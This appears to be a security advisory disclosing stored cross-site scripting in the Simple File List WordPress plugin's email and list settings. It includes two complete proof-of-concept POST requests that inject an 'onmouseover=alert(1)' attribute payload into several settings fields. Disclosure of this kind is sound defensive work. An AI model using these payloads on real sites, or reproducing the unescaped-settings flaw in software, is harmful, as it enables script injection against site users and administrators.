The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
# First Stored XSS - HTTP Request POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=email_settings HTTP/1.1 Host: target ... ... eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit=SAVE +++++++++++++++++++++++ # Second Stored XSS - HTTP Request POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=list_settings HTTP/1.1 Host: target ... ... eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList=YES&eeSortBy=DateMod&eeSortOrder=Descending&eeGenerateImgThumbs=YES&eeShowFileThumb=YES&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate=YES&eeLabelDate=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize=YES&eeLabelSize=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader=YES&eeSmoothScroll=YES&eeShowFileDescription=YES&eeShowFileExtension=YES&eeShowFileActions=YES&eeShowFileOpen=YES&eeShowFileDownload=YES&eeShowFileCopyLink=YES&submit=SAVE
Raad Haddad of Cloudyrion GmbH
Raad Haddad of Cloudyrion GmbH
Yes
2022-09-19 (about 1 years ago)
2022-09-19 (about 1 years ago)
2022-09-19 (about 1 years ago)